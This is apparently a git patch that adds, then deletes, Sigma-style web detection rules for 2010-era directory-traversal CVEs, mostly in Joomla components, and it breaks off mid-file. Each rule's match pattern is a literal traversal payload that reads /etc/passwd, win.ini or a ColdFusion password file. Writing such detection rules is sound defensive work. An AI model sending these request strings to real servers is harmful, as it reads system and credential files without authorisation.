/index.php?option=com_zimbcomment&controller=../../../../../../../../../../etc/passwd%00 + condition: selection +false_positives: +- Scanning from Nuclei +- Penetration Testing Activity +- Unknown +tags: +- attack.initial_access +- attack.t1190 +level: critical diff --git a/rules/web/web_cve_CVE-2010-1657 exploitation attempt.yaml b/rules/web/web_cve_CVE-2010-1657 exploitation attempt.yaml new file mode 100644 index 00000000..447bbe51 --- /dev/null +++ b/rules/web/web_cve_CVE-2010-1657 exploitation attempt.yaml @@ -0,0 +1,25 @@ +title: CVE-2010-1657 exploitation attempt +id: 7bdc9bd3-8dcd-4187-ab28-98b20cc1d020 +Author: Subhash Popuri (@pbssubhash) +date: 25/08/2021 +status: experimental +description: Directory traversal vulnerability in the SmartSite (com_smartsite) component + 1.0.0 for Joomla! allows remote attackers to read arbitrary files via a .. (dot + dot) in the controller parameter to index.php. +references: +- https://www.exploit-db.com/exploits/12428 +- https://www.cvedetails.com/cve/CVE-2010-1657 +- https://github.com/projectdiscovery/nuclei-templates +detection: + selection: + c-uri|contains: + - /index.php?option=com_smartsite&controller=../../../../../../../../../../etc/passwd%00 + condition: selection +false_positives: +- Scanning from Nuclei +- Penetration Testing Activity +- Unknown +tags: +- attack.initial_access +- attack.t1190 +level: critical diff --git a/rules/web/web_cve_CVE-2010-1718 exploitation attempt.yaml b/rules/web/web_cve_CVE-2010-1718 exploitation attempt.yaml new file mode 100644 index 00000000..148380f1 --- /dev/null +++ b/rules/web/web_cve_CVE-2010-1718 exploitation attempt.yaml @@ -0,0 +1,24 @@ +title: CVE-2010-1718 exploitation attempt +id: a538251c-d600-43f3-8051-c3a83a5e8702 +Author: Subhash Popuri (@pbssubhash) +date: 25/08/2021 +status: experimental +description: Directory traversal vulnerability in archeryscores.php in the Archery + Scores (com_archeryscores) component 1.0.6 for Joomla! allows remote attackers to + include and execute arbitrary local files via a .. (dot dot) in the controller parameter + to index.php. +references: +- https://github.com/projectdiscovery/nuclei-templates +detection: + selection: + c-uri|contains: + - /index.php?option=com_archeryscores&controller=../../../../../../../../../etc/passwd%00 + condition: selection +false_positives: +- Scanning from Nuclei +- Penetration Testing Activity +- Unknown +tags: +- attack.initial_access +- attack.t1190 +level: critical diff --git a/rules/web/web_cve_CVE-2010-1722 exploitation attempt.yaml b/rules/web/web_cve_CVE-2010-1722 exploitation attempt.yaml new file mode 100644 index 00000000..94179320 --- /dev/null +++ b/rules/web/web_cve_CVE-2010-1722 exploitation attempt.yaml @@ -0,0 +1,25 @@ +title: CVE-2010-1722 exploitation attempt +id: 84715b18-505d-4252-9470-03c98a3006e5 +Author: Subhash Popuri (@pbssubhash) +date: 25/08/2021 +status: experimental +description: Directory traversal vulnerability in the Online Market (com_market) component + 2.x for Joomla! allows remote attackers to read arbitrary files and possibly have + unspecified other impact via a .. (dot dot) in the controller parameter to index.php. +references: +- https://www.exploit-db.com/exploits/12177 +- https://www.cvedetails.com/cve/CVE-2010-1722 +- https://github.com/projectdiscovery/nuclei-templates +detection: + selection: + c-uri|contains: + - /index.php?option=com_market&controller=../../../../../../../../../../etc/passwd%00 + condition: selection +false_positives: +- Scanning from Nuclei +- Penetration Testing Activity +- Unknown +tags: +- attack.initial_access +- attack.t1190 +level: critical diff --git a/rules/web/web_cve_CVE-2010-1875 exploitation attempt.yaml b/rules/web/web_cve_CVE-2010-1875 exploitation attempt.yaml new file mode 100644 index 00000000..9bd796a5 --- /dev/null +++ b/rules/web/web_cve_CVE-2010-1875 exploitation attempt.yaml @@ -0,0 +1,26 @@ +title: CVE-2010-1875 exploitation attempt +id: af757e17-ad81-4a28-a551-49c17aa5113a +Author: Subhash Popuri (@pbssubhash) +date: 25/08/2021 +status: experimental +description: Directory traversal vulnerability in the Real Estate Property (com_properties) + component 3.1.22-03 for Joomla! allows remote attackers to read arbitrary files + and possibly have unspecified other impact via a .. (dot dot) in the controller + parameter to index.php. +references: +- https://www.exploit-db.com/exploits/11851 +- https://www.cvedetails.com/cve/CVE-2010-1875 +- https://github.com/projectdiscovery/nuclei-templates +detection: + selection: + c-uri|contains: + - /index.php?option=com_properties&controller=../../../../../../../../../../../../../etc/passwd%00 + condition: selection +false_positives: +- Scanning from Nuclei +- Penetration Testing Activity +- Unknown +tags: +- attack.initial_access +- attack.t1190 +level: critical diff --git a/rules/web/web_cve_CVE-2010-1953 exploitation attempt.yaml b/rules/web/web_cve_CVE-2010-1953 exploitation attempt.yaml new file mode 100644 index 00000000..4f10cf4e --- /dev/null +++ b/rules/web/web_cve_CVE-2010-1953 exploitation attempt.yaml @@ -0,0 +1,25 @@ +title: CVE-2010-1953 exploitation attempt +id: 0fc4af77-6974-4e50-bf5e-9f175304eb54 +Author: Subhash Popuri (@pbssubhash) +date: 25/08/2021 +status: experimental +description: Directory traversal vulnerability in the iNetLanka Multiple Map (com_multimap) + component 1.0 for Joomla! allows remote attackers to read arbitrary files via a + .. (dot dot) in the controller parameter to index.php. +references: +- https://www.exploit-db.com/exploits/12288 +- https://www.cvedetails.com/cve/CVE-2010-1953 +- https://github.com/projectdiscovery/nuclei-templates +detection: + selection: + c-uri|contains: + - /index.php?option=com_multimap&controller=../../../../../../../../../../etc/passwd%00 + condition: selection +false_positives: +- Scanning from Nuclei +- Penetration Testing Activity +- Unknown +tags: +- attack.initial_access +- attack.t1190 +level: critical diff --git a/rules/web/web_cve_CVE-2010-1954 exploitation attempt.yaml b/rules/web/web_cve_CVE-2010-1954 exploitation attempt.yaml new file mode 100644 index 00000000..23ef2619 --- /dev/null +++ b/rules/web/web_cve_CVE-2010-1954 exploitation attempt.yaml @@ -0,0 +1,23 @@ +title: CVE-2010-1954 exploitation attempt +id: 2ccf65c5-e4b3-48f6-961e-93bbd537ca80 +Author: Subhash Popuri (@pbssubhash) +date: 25/08/2021 +status: experimental +description: Directory traversal vulnerability in the iNetLanka Multiple root (com_multiroot) + component 1.0 and 1.1 for Joomla! allows remote attackers to read arbitrary files + via a .. (dot dot) in the controller parameter to index.php. +references: +- https://github.com/projectdiscovery/nuclei-templates +detection: + selection: + c-uri|contains: + - /index.php?option=com_multiroot&controller=../../../../../../../../../../etc/passwd%00 + condition: selection +false_positives: +- Scanning from Nuclei +- Penetration Testing Activity +- Unknown +tags: +- attack.initial_access +- attack.t1190 +level: critical diff --git a/rules/web/web_cve_CVE-2010-1955 exploitation attempt.yaml b/rules/web/web_cve_CVE-2010-1955 exploitation attempt.yaml new file mode 100644 index 00000000..10d81d67 --- /dev/null +++ b/rules/web/web_cve_CVE-2010-1955 exploitation attempt.yaml @@ -0,0 +1,25 @@ +title: CVE-2010-1955 exploitation attempt +id: 497c0911-226f-48a1-ac9f-518ffb98e65e +Author: Subhash Popuri (@pbssubhash) +date: 25/08/2021 +status: experimental +description: Directory traversal vulnerability in the Deluxe Blog Factory (com_blogfactory) + component 1.1.2 for Joomla! allows remote attackers to read arbitrary files via + a .. (dot dot) in the controller parameter to index.php. +references: +- https://www.exploit-db.com/exploits/12238 +- https://www.cvedetails.com/cve/CVE-2010-1955 +- https://github.com/projectdiscovery/nuclei-templates +detection: + selection: + c-uri|contains: + - /index.php?option=com_blogfactory&controller=../../../../../../../../../../etc/passwd%00 + condition: selection +false_positives: +- Scanning from Nuclei +- Penetration Testing Activity +- Unknown +tags: +- attack.initial_access +- attack.t1190 +level: critical diff --git a/rules/web/web_cve_CVE-2010-1979 exploitation attempt.yaml b/rules/web/web_cve_CVE-2010-1979 exploitation attempt.yaml new file mode 100644 index 00000000..80eb1897 --- /dev/null +++ b/rules/web/web_cve_CVE-2010-1979 exploitation attempt.yaml @@ -0,0 +1,25 @@ +title: CVE-2010-1979 exploitation attempt +id: 5b1c3030-e17b-43b3-b95e-952355a0f43f +Author: Subhash Popuri (@pbssubhash) +date: 25/08/2021 +status: experimental +description: Directory traversal vulnerability in the Affiliate Datafeeds (com_datafeeds) + component build 880 for Joomla! allows remote attackers to read arbitrary files + via a .. (dot dot) in the controller parameter to index.php. +references: +- https://www.exploit-db.com/exploits/12088 +- https://www.cvedetails.com/cve/CVE-2010-1979 +- https://github.com/projectdiscovery/nuclei-templates +detection: + selection: + c-uri|contains: + - /index.php?option=com_datafeeds&controller=../../../../../../../../../../etc/passwd%00 + condition: selection +false_positives: +- Scanning from Nuclei +- Penetration Testing Activity +- Unknown +tags: +- attack.initial_access +- attack.t1190 +level: critical diff --git a/rules/web/web_cve_CVE-2010-1983 exploitation attempt.yaml b/rules/web/web_cve_CVE-2010-1983 exploitation attempt.yaml new file mode 100644 index 00000000..a29bfea4 --- /dev/null +++ b/rules/web/web_cve_CVE-2010-1983 exploitation attempt.yaml @@ -0,0 +1,25 @@ +title: CVE-2010-1983 exploitation attempt +id: c4f29c4f-0281-4518-a824-88f259d92ef5 +Author: Subhash Popuri (@pbssubhash) +date: 25/08/2021 +status: experimental +description: Directory traversal vulnerability in the redTWITTER (com_redtwitter) + component 1.0.x including 1.0b11 for Joomla! allows remote attackers to read arbitrary + files via a .. (dot dot) in the view parameter to index.php +references: +- https://www.exploit-db.com/exploits/12055 +- https://www.cvedetails.com/cve/CVE-2010-1983 +- https://github.com/projectdiscovery/nuclei-templates +detection: + selection: + c-uri|contains: + - /index.php?option=com_redtwitter&view=../../../../../../../../../../../../../../../etc/passwd%00 + condition: selection +false_positives: +- Scanning from Nuclei +- Penetration Testing Activity +- Unknown +tags: +- attack.initial_access +- attack.t1190 +level: critical diff --git a/rules/web/web_cve_CVE-2010-2033 exploitation attempt.yaml b/rules/web/web_cve_CVE-2010-2033 exploitation attempt.yaml new file mode 100644 index 00000000..20b4dc70 --- /dev/null +++ b/rules/web/web_cve_CVE-2010-2033 exploitation attempt.yaml @@ -0,0 +1,26 @@ +title: CVE-2010-2033 exploitation attempt +id: b5c6267a-7b2e-47c8-84dd-68a89ceb1e64 +Author: Subhash Popuri (@pbssubhash) +date: 25/08/2021 +status: experimental +description: Directory traversal vulnerability in the Percha Fields Attach (com_perchafieldsattach) + component 1.x for Joomla! allows remote attackers to read arbitrary files and possibly + have unspecified other impact via a .. (dot dot) in the controller parameter to + index.php. +references: +- https://packetstormsecurity.com/files/89654/Joomla-Percha-Categories-Tree-0.6-Local-File-Inclusion.html +- https://www.cvedetails.com/cve/CVE-2010-2033 +- https://github.com/projectdiscovery/nuclei-templates +detection: + selection: + c-uri|contains: + - /index.php?option=com_perchacategoriestree&controller=../../../../../../../../../../etc/passwd%00 + condition: selection +false_positives: +- Scanning from Nuclei +- Penetration Testing Activity +- Unknown +tags: +- attack.initial_access +- attack.t1190 +level: critical diff --git a/rules/web/web_cve_CVE-2010-2036 exploitation attempt.yaml b/rules/web/web_cve_CVE-2010-2036 exploitation attempt.yaml new file mode 100644 index 00000000..f6c9adca --- /dev/null +++ b/rules/web/web_cve_CVE-2010-2036 exploitation attempt.yaml @@ -0,0 +1,26 @@ +title: CVE-2010-2036 exploitation attempt +id: 5f89e5fb-6f87-4fee-96b2-700e987a1c7e +Author: Subhash Popuri (@pbssubhash) +date: 25/08/2021 +status: experimental +description: Directory traversal vulnerability in the Percha Fields Attach (com_perchafieldsattach) + component 1.x for Joomla! allows remote attackers to read arbitrary files and possibly + have unspecified other impact via a .. (dot dot) in the controller parameter to + index.php. +references: +- https://www.exploit-db.com/exploits/34004 +- https://www.cvedetails.com/cve/CVE-2010-2036 +- https://github.com/projectdiscovery/nuclei-templates +detection: + selection: + c-uri|contains: + - /index.php?option=com_perchafieldsattach&controller=../../../../../../../../../../etc/passwd%00 + condition: selection +false_positives: +- Scanning from Nuclei +- Penetration Testing Activity +- Unknown +tags: +- attack.initial_access +- attack.t1190 +level: critical diff --git a/rules/web/web_cve_CVE-2010-2259 exploitation attempt.yaml b/rules/web/web_cve_CVE-2010-2259 exploitation attempt.yaml new file mode 100644 index 00000000..70cc525b --- /dev/null +++ b/rules/web/web_cve_CVE-2010-2259 exploitation attempt.yaml @@ -0,0 +1,25 @@ +title: CVE-2010-2259 exploitation attempt +id: 7ead4790-e0f8-41fa-bb14-f1d225964fd4 +Author: Subhash Popuri (@pbssubhash) +date: 25/08/2021 +status: experimental +description: Directory traversal vulnerability in the BF Survey (com_bfsurvey) component + for Joomla! allows remote attackers to include and execute arbitrary local files + via a .. (dot dot) in the controller parameter to index.php. +references: +- https://www.exploit-db.com/exploits/10946 +- https://www.cvedetails.com/cve/CVE-2010-2259 +- https://github.com/projectdiscovery/nuclei-templates +detection: + selection: + c-uri|contains: + - /index.php?option=com_bfsurvey&controller=../../../../../../../../../../../../etc/passwd%00 + condition: selection +false_positives: +- Scanning from Nuclei +- Penetration Testing Activity +- Unknown +tags: +- attack.initial_access +- attack.t1190 +level: critical diff --git a/rules/web/web_cve_CVE-2010-2307 exploitation attempt.yaml b/rules/web/web_cve_CVE-2010-2307 exploitation attempt.yaml new file mode 100644 index 00000000..32008b7c --- /dev/null +++ b/rules/web/web_cve_CVE-2010-2307 exploitation attempt.yaml @@ -0,0 +1,26 @@ +title: CVE-2010-2307 exploitation attempt +id: 6e0a4fc5-c7a5-40c6-a080-bc5a452637a9 +Author: Subhash Popuri (@pbssubhash) +date: 25/08/2021 +status: experimental +description: Multiple directory traversal vulnerabilities in the web server for Motorola + SURFBoard cable modem SBV6120E running firmware SBV6X2X-1.0.0.5-SCM-02-SHPC allow + remote attackers to read arbitrary files via (1) "//" (multiple leading slash), + (2) ../ (dot dot) sequences, and encoded dot dot sequences in a URL request. +references: +- https://www.securityfocus.com/bid/40550/info +- https://nvd.nist.gov/vuln/detail/CVE-2010-2307 +- https://github.com/projectdiscovery/nuclei-templates +detection: + selection: + c-uri|contains: + - /../../etc/passwd + condition: selection +false_positives: +- Scanning from Nuclei +- Penetration Testing Activity +- Unknown +tags: +- attack.initial_access +- attack.t1190 +level: critical diff --git a/rules/web/web_cve_CVE-2010-2682 exploitation attempt.yaml b/rules/web/web_cve_CVE-2010-2682 exploitation attempt.yaml new file mode 100644 index 00000000..01e0fedc --- /dev/null +++ b/rules/web/web_cve_CVE-2010-2682 exploitation attempt.yaml @@ -0,0 +1,26 @@ +title: CVE-2010-2682 exploitation attempt +id: 5f7ea8cf-47e3-46e6-a173-43a99c904e43 +Author: Subhash Popuri (@pbssubhash) +date: 25/08/2021 +status: experimental +description: Directory traversal vulnerability in the Realtyna Translator (com_realtyna) + component 1.0.15 for Joomla! allows remote attackers to read arbitrary files and + possibly have unspecified other impact via a .. (dot dot) in the controller parameter + to index.php. +references: +- https://www.exploit-db.com/exploits/14017 +- https://www.cvedetails.com/cve/CVE-2010-2682 +- https://github.com/projectdiscovery/nuclei-templates +detection: + selection: + c-uri|contains: + - /index.php?option=com_realtyna&controller=../../../../../../../../../../../../../../../etc/passwd%00 + condition: selection +false_positives: +- Scanning from Nuclei +- Penetration Testing Activity +- Unknown +tags: +- attack.initial_access +- attack.t1190 +level: critical diff --git a/rules/web/web_cve_CVE-2010-2861 exploitation attempt.yaml b/rules/web/web_cve_CVE-2010-2861 exploitation attempt.yaml new file mode 100644 index 00000000..7dc8e6df --- /dev/null +++ b/rules/web/web_cve_CVE-2010-2861 exploitation attempt.yaml @@ -0,0 +1,27 @@ +title: CVE-2010-2861 exploitation attempt +id: 21032758-8761-4a18-8f66-bace612e2481 +Author: Subhash Popuri (@pbssubhash) +date: 25/08/2021 +status: experimental +description: Multiple directory traversal vulnerabilities in the administrator console + in Adobe ColdFusion 9.0.1 and earlier allow remote attackers to read arbitrary files + via the locale parameter to (1) CFIDE/administrator/settings/mappings.cfm, (2) logging/settings.cfm, + (3) datasources/index.cfm, (4) j2eepackaging/editarchive.cfm, and (5) enter.cfm + in CFIDE/administrator/. +references: +- https://github.com/vulhub/vulhub/tree/master/coldfusion/CVE-2010-2861 +- http://www.adobe.com/support/security/bulletins/apsb10-18.html +- https://github.com/projectdiscovery/nuclei-templates +detection: + selection: + c-uri|contains: + - /CFIDE/administrator/enter.cfm?locale=../../../../../../../lib/password.properties%00en + condition: selection +false_positives: +- Scanning from Nuclei +- Penetration Testing Activity +- Unknown +tags: +- attack.initial_access +- attack.t1190 +level: critical diff --git a/rules/web/web_cve_CVE-2010-3426 exploitation attempt.yaml b/rules/web/web_cve_CVE-2010-3426 exploitation attempt.yaml new file mode 100644 index 00000000..ad2dab17 --- /dev/null +++ b/rules/web/web_cve_CVE-2010-3426 exploitation attempt.yaml @@ -0,0 +1,23 @@ +title: CVE-2010-3426 exploitation attempt +id: 06621f7e-2987-4625-8c42-d66951a9da9d +Author: Subhash Popuri (@pbssubhash) +date: 25/08/2021 +status: experimental +description: Directory traversal vulnerability in jphone.php in the JPhone (com_jphone) + component 1.0 Alpha 3 for Joomla! allows remote attackers to include and execute + arbitrary local files via a .. (dot dot) in the controller parameter to index.php. +references: +- https://github.com/projectdiscovery/nuclei-templates +detection: + selection: + c-uri|contains: + - /index.php?option=com_jphone&controller=../../../../../../../../../../etc/passwd%00 + condition: selection +false_positives: +- Scanning from Nuclei +- Penetration Testing Activity +- Unknown +tags: +- attack.initial_access +- attack.t1190 +level: critical diff --git a/rules/web/web_cve_CVE-2010-4231 exploitation attempt.yaml b/rules/web/web_cve_CVE-2010-4231 exploitation attempt.yaml new file mode 100644 index 00000000..5e4062f3 --- /dev/null +++ b/rules/web/web_cve_CVE-2010-4231 exploitation attempt.yaml @@ -0,0 +1,25 @@ +title: CVE-2010-4231 exploitation attempt +id: 8eb41b36-2b5a-44e0-a44b-b0ebdbff3e1b +Author: Subhash Popuri (@pbssubhash) +date: 25/08/2021 +status: experimental +description: The CMNC-200 IP Camera has a built-in web server that is enabled by default. + The server is vulnerable to directory transversal attacks, allowing access to any + file on the camera file system. +references: +- https://nvd.nist.gov/vuln/detail/CVE-2010-4231 +- https://www.exploit-db.com/exploits/15505 +- https://github.com/projectdiscovery/nuclei-templates +detection: + selection: + c-uri|contains: + - /../../../../../../../../../../../../../etc/passwd + condition: selection +false_positives: +- Scanning from Nuclei +- Penetration Testing Activity +- Unknown +tags: +- attack.initial_access +- attack.t1190 +level: critical diff --git a/rules/web/web_cve_CVE-2010-4617 exploitation attempt.yaml b/rules/web/web_cve_CVE-2010-4617 exploitation attempt.yaml new file mode 100644 index 00000000..080cc881 --- /dev/null +++ b/rules/web/web_cve_CVE-2010-4617 exploitation attempt.yaml @@ -0,0 +1,25 @@ +title: CVE-2010-4617 exploitation attempt +id: ed14d2cb-8716-4ab1-a819-36d173e617ab +Author: Subhash Popuri (@pbssubhash) +date: 25/08/2021 +status: experimental +description: Directory traversal vulnerability in the JotLoader (com_jotloader) component + 2.2.1 for Joomla! allows remote attackers to read arbitrary files via directory + traversal sequences in the section parameter to index.php. +references: +- https://www.exploit-db.com/exploits/15791 +- https://www.cvedetails.com/cve/CVE-2010-4617 +- https://github.com/projectdiscovery/nuclei-templates +detection: + selection: + c-uri|contains: + - /index.php?option=com_jotloader§ion=../../../../../../../../../../../../../../etc/passwd%00 + condition: selection +false_positives: +- Scanning from Nuclei +- Penetration Testing Activity +- Unknown +tags: +- attack.initial_access +- attack.t1190 +level: critical diff --git a/rules/web/web_cve_CVE-2010-5278 exploitation attempt.yaml b/rules/web/web_cve_CVE-2010-5278 exploitation attempt.yaml new file mode 100644 index 00000000..cf20ed0e --- /dev/null +++ b/rules/web/web_cve_CVE-2010-5278 exploitation attempt.yaml @@ -0,0 +1,26 @@ +title: CVE-2010-5278 exploitation attempt +id: 57bb7f1b-bb41-400d-a6e4-7eb2b70b3593 +Author: Subhash Popuri (@pbssubhash) +date: 25/08/2021 +status: experimental +description: Directory traversal vulnerability in manager/controllers/default/resource/tvs.php + in MODx Revolution 2.0.2-pl, and possibly earlier, when magic_quotes_gpc is disabled, + allows remote attackers to read arbitrary files via a .. (dot dot) in the class_key + parameter. +references: +- https://www.exploit-db.com/exploits/34788 +- https://www.cvedetails.com/cve/CVE-2010-5278 +- https://github.com/projectdiscovery/nuclei-templates +detection: + selection: + c-uri|contains: + - /manager/controllers/default/resource/tvs.php?class_key=../../../../../../../../../../windows/win.ini%00 + condition: selection +false_positives: +- Scanning from Nuclei +- Penetration Testing Activity +- Unknown +tags: +- attack.initial_access +- attack.t1190 +level: critical From e3331a4d0abbbcde76d10876a3d94ec9c3a23365 Mon Sep 17 00:00:00 2001 From: pbssubhash Date: Wed, 25 Aug 2021 21:40:32 +0530 Subject: [PATCH 0580/1367] Cleanup --- ...ve_CVE-2010-0943 exploitation attempt.yaml | 25 ----------------- ...ve_CVE-2010-0944 exploitation attempt.yaml | 25 ----------------- ...ve_CVE-2010-1306 exploitation attempt.yaml | 23 ---------------- ...ve_CVE-2010-1314 exploitation attempt.yaml | 23 ---------------- ...ve_CVE-2010-1345 exploitation attempt.yaml | 23 ---------------- ...ve_CVE-2010-1353 exploitation attempt.yaml | 25 ----------------- ...ve_CVE-2010-1474 exploitation attempt.yaml | 26 ------------------ ...ve_CVE-2010-1475 exploitation attempt.yaml | 24 ----------------- ...ve_CVE-2010-1495 exploitation attempt.yaml | 25 ----------------- ...ve_CVE-2010-1532 exploitation attempt.yaml | 24 ----------------- ...ve_CVE-2010-1533 exploitation attempt.yaml | 23 ---------------- ...ve_CVE-2010-1535 exploitation attempt.yaml | 24 ----------------- ...ve_CVE-2010-1602 exploitation attempt.yaml | 26 ------------------ ...ve_CVE-2010-1657 exploitation attempt.yaml | 25 ----------------- ...ve_CVE-2010-1718 exploitation attempt.yaml | 24 ----------------- ...ve_CVE-2010-1722 exploitation attempt.yaml | 25 ----------------- ...ve_CVE-2010-1875 exploitation attempt.yaml | 26 ------------------ ...ve_CVE-2010-1953 exploitation attempt.yaml | 25 ----------------- ...ve_CVE-2010-1954 exploitation attempt.yaml | 23 ---------------- ...ve_CVE-2010-1955 exploitation attempt.yaml | 25 ----------------- ...ve_CVE-2010-1979 exploitation attempt.yaml | 25 ----------------- ...ve_CVE-2010-1983 exploitation attempt.yaml | 25 ----------------- ...ve_CVE-2010-2033 exploitation attempt.yaml | 26 ------------------ ...ve_CVE-2010-2036 exploitation attempt.yaml | 26 ------------------ ...ve_CVE-2010-2259 exploitation attempt.yaml | 25 ----------------- ...ve_CVE-2010-2307 exploitation attempt.yaml | 26 ------------------ ...ve_CVE-2010-2682 exploitation attempt.yaml | 26 ------------------ ...ve_CVE-2010-2861 exploitation attempt.yaml | 27 ------------------- ...ve_CVE-2010-3426 exploitation attempt.yaml | 23 ---------------- ...ve_CVE-2010-4231 exploitation attempt.yaml | 25 ----------------- ...ve_CVE-2010-4617 exploitation attempt.yaml | 25 ----------------- ...ve_CVE-2010-5278 exploitation attempt.yaml | 26 ------------------ 32 files changed, 794 deletions(-) delete mode 100644 rules/web/web_cve_CVE-2010-0943 exploitation attempt.yaml delete mode 100644 rules/web/web_cve_CVE-2010-0944 exploitation attempt.yaml delete mode 100644 rules/web/web_cve_CVE-2010-1306 exploitation attempt.yaml delete mode 100644 rules/web/web_cve_CVE-2010-1314 exploitation attempt.yaml delete mode 100644 rules/web/web_cve_CVE-2010-1345 exploitation attempt.yaml delete mode 100644 rules/web/web_cve_CVE-2010-1353 exploitation attempt.yaml delete mode 100644 rules/web/web_cve_CVE-2010-1474 exploitation attempt.yaml delete mode 100644 rules/web/web_cve_CVE-2010-1475 exploitation attempt.yaml delete mode 100644 rules/web/web_cve_CVE-2010-1495 exploitation attempt.yaml delete mode 100644 rules/web/web_cve_CVE-2010-1532 exploitation attempt.yaml delete mode 100644 rules/web/web_cve_CVE-2010-1533 exploitation attempt.yaml delete mode 100644 rules/web/web_cve_CVE-2010-1535 exploitation attempt.yaml delete mode 100644 rules/web/web_cve_CVE-2010-1602 exploitation attempt.yaml delete mode 100644 rules/web/web_cve_CVE-2010-1657 exploitation attempt.yaml delete mode 100644 rules/web/web_cve_CVE-2010-1718 exploitation attempt.yaml delete mode 100644 rules/web/web_cve_CVE-2010-1722 exploitation attempt.yaml delete mode 100644 rules/web/web_cve_CVE-2010-1875 exploitation attempt.yaml delete mode 100644 rules/web/web_cve_CVE-2010-1953 exploitation attempt.yaml delete mode 100644 rules/web/web_cve_CVE-2010-1954 exploitation attempt.yaml delete mode 100644 rules/web/web_cve_CVE-2010-1955 exploitation attempt.yaml delete mode 100644 rules/web/web_cve_CVE-2010-1979 exploitation attempt.yaml delete mode 100644 rules/web/web_cve_CVE-2010-1983 exploitation attempt.yaml delete mode 100644 rules/web/web_cve_CVE-2010-2033 exploitation attempt.yaml delete mode 100644 rules/web/web_cve_CVE-2010-2036 exploitation attempt.yaml delete mode 100644 rules/web/web_cve_CVE-2010-2259 exploitation attempt.yaml delete mode 100644 rules/web/web_cve_CVE-2010-2307 exploitation attempt.yaml delete mode 100644 rules/web/web_cve_CVE-2010-2682 exploitation attempt.yaml delete mode 100644 rules/web/web_cve_CVE-2010-2861 exploitation attempt.yaml delete mode 100644 rules/web/web_cve_CVE-2010-3426 exploitation attempt.yaml delete mode 100644 rules/web/web_cve_CVE-2010-4231 exploitation attempt.yaml delete mode 100644 rules/web/web_cve_CVE-2010-4617 exploitation attempt.yaml delete mode 100644 rules/web/web_cve_CVE-2010-5278 exploitation attempt.yaml diff --git a/rules/web/web_cve_CVE-2010-0943 exploitation attempt.yaml b/rules/web/web_cve_CVE-2010-0943 exploitation attempt.yaml deleted file mode 100644 index d6be923a..00000000 --- a/rules/web/web_cve_CVE-2010-0943 exploitation attempt.yaml +++ /dev/null @@ -1,25 +0,0 @@ -title: CVE-2010-0943 exploitation attempt -id: 63b70c55-0d7a-4e2f-a130-11028352b6ff -Author: Subhash Popuri (@pbssubhash) -date: 25/08/2021 -status: experimental -description: Directory traversal vulnerability in the JA Showcase (com_jashowcase) - component for Joomla! allows remote attackers to read arbitrary files via a .. (dot - dot) in the controller parameter in a jashowcase action to index.php. -references: -- https://www.exploit-db.com/exploits/11090 -- https://www.cvedetails.com/cve/CVE-2010-0943 -- https://github.com/projectdiscovery/nuclei-templates -detection: - selection: - c-uri|contains: - - /index.php?option=com_jashowcase&view=jashowcase&controller=../../../../../../../etc/passwd%00 - condition: selection -false_positives: -- Scanning from Nuclei -- Penetration Testing Activity -- Unknown -tags: -- attack.initial_access -- attack.t1190 -level: critical diff --git a/rules/web/web_cve_CVE-2010-0944 exploitation attempt.yaml b/rules/web/web_cve_CVE-2010-0944 exploitation attempt.yaml deleted file mode 100644 index c38d952b..00000000 --- a/rules/web/web_cve_CVE-2010-0944 exploitation attempt.yaml +++ /dev/null @@ -1,25 +0,0 @@ -title: CVE-2010-0944 exploitation attempt -id: d30903f7-cb51-445f-81a1-f2948f5fb763 -Author: Subhash Popuri (@pbssubhash) -date: 25/08/2021 -status: experimental -description: Directory traversal vulnerability in the JCollection (com_jcollection) - component for Joomla! allows remote attackers to read arbitrary files via a .. (dot - dot) in the controller parameter to index.php. -references: -- https://www.exploit-db.com/exploits/11088 -- https://www.cvedetails.com/cve/CVE-2010-0944 -- https://github.com/projectdiscovery/nuclei-templates -detection: - selection: - c-uri|contains: - - /index.php?option=com_jcollection&controller=../../../../../../../etc/passwd%00 - condition: selection -false_positives: -- Scanning from Nuclei -- Penetration Testing Activity -- Unknown -tags: -- attack.initial_access -- attack.t1190 -level: critical diff --git a/rules/web/web_cve_CVE-2010-1306 exploitation attempt.yaml b/rules/web/web_cve_CVE-2010-1306 exploitation attempt.yaml deleted file mode 100644 index 70431ad7..00000000 --- a/rules/web/web_cve_CVE-2010-1306 exploitation attempt.yaml +++ /dev/null @@ -1,23 +0,0 @@ -title: CVE-2010-1306 exploitation attempt -id: a12a5acd-3ebf-46b8-9ff3-95daeb84b801 -Author: Subhash Popuri (@pbssubhash) -date: 25/08/2021 -status: experimental -description: Directory traversal vulnerability in the Picasa (com_joomlapicasa2) component - 2.0 and 2.0.5 for Joomla! allows remote attackers to read arbitrary local files - via a .. (dot dot) in the controller parameter to index.php. -references: -- https://github.com/projectdiscovery/nuclei-templates -detection: - selection: - c-uri|contains: - - /index.php?option=com_joomlapicasa2&controller=../../../../../etc/passwd%00 - condition: selection -false_positives: -- Scanning from Nuclei -- Penetration Testing Activity -- Unknown -tags: -- attack.initial_access -- attack.t1190 -level: critical diff --git a/rules/web/web_cve_CVE-2010-1314 exploitation attempt.yaml b/rules/web/web_cve_CVE-2010-1314 exploitation attempt.yaml deleted file mode 100644 index 7faa239f..00000000 --- a/rules/web/web_cve_CVE-2010-1314 exploitation attempt.yaml +++ /dev/null @@ -1,23 +0,0 @@ -title: CVE-2010-1314 exploitation attempt -id: 24c87e4f-7206-451a-9164-364ca4f3c388 -Author: Subhash Popuri (@pbssubhash) -date: 25/08/2021 -status: experimental -description: Directory traversal vulnerability in the Highslide JS (com_hsconfig) - component 1.5 and 2.0.9 for Joomla! allows remote attackers to read arbitrary files - via a .. (dot dot) in the controller parameter to index.php. -references: -- https://github.com/projectdiscovery/nuclei-templates -detection: - selection: - c-uri|contains: - - /index.php?option=com_hsconfig&controller=../../../../../../../../../../etc/passwd%00 - condition: selection -false_positives: -- Scanning from Nuclei -- Penetration Testing Activity -- Unknown -tags: -- attack.initial_access -- attack.t1190 -level: critical diff --git a/rules/web/web_cve_CVE-2010-1345 exploitation attempt.yaml b/rules/web/web_cve_CVE-2010-1345 exploitation attempt.yaml deleted file mode 100644 index 25b32926..00000000 --- a/rules/web/web_cve_CVE-2010-1345 exploitation attempt.yaml +++ /dev/null @@ -1,23 +0,0 @@ -title: CVE-2010-1345 exploitation attempt -id: 5f723f65-f584-49f3-87c0-7babbae20d9d -Author: Subhash Popuri (@pbssubhash) -date: 25/08/2021 -status: experimental -description: Directory traversal vulnerability in the Cookex Agency CKForms (com_ckforms) - component 1.3.3 for Joomla! allows remote attackers to read arbitrary files via - a .. (dot dot) in the controller parameter to index.php. -references: -- https://github.com/projectdiscovery/nuclei-templates -detection: - selection: - c-uri|contains: - - 